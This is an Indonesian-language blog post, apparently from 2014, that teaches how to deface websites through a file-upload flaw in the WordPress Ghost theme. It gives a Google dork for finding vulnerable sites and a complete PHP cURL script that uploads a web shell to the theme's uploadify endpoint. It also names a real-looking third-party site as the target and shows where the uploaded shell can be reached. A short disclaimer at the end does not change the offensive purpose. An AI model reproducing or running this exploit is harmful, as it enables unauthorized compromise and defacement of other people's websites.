Monday, October 13, 2014

Cara deface dengan Teknik WordPress Ghost theme File Upload





Assalamualaikum , kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416

1. Download XAAMP nya Disini HERE
2. Install XAMMP



Google Dork : inurl:wp-content/themes/Ghost/


Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )



Sekarang Kamu Copy Kan Exploitnya 



<?php
$uploadfile="yourFile.php";
$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Lalu Simpan dengan namafile.php untuk nama bisa kamu pake sembarangan , disini saya akan simpan dengan Nama x.php

Sekarang , kamu copykan file shell kamu , Disini nama shell saya adalah a.php



Lalu , Kamu buka cmd , dan ketikkan cd\

ketikkan cd xammp [enter] dan cd php [enter]


Sekarang kita akan mengexploitkan targetnya disini saya dapat targetnya yaitu 

Sekarang Kamu Tambahkan dengan ini 
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Jadi websitenya akan menjadi 
http://retotarahumara.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Lalu Jika Muncul {"status":"NOK", "ERR":"This file is incorect"} Berarti Vuln 

Kembali ke CMD , ketikkan php namafile.php lalu Enter 


Jika muncul seperti itu maka Exploit Succes :))

Untuk shell Acces berada disini http:///wp-content/uploads/settingsimages/a.php




0 komentar:

Post a Comment

I just a newbie and student, don't using this article for criminal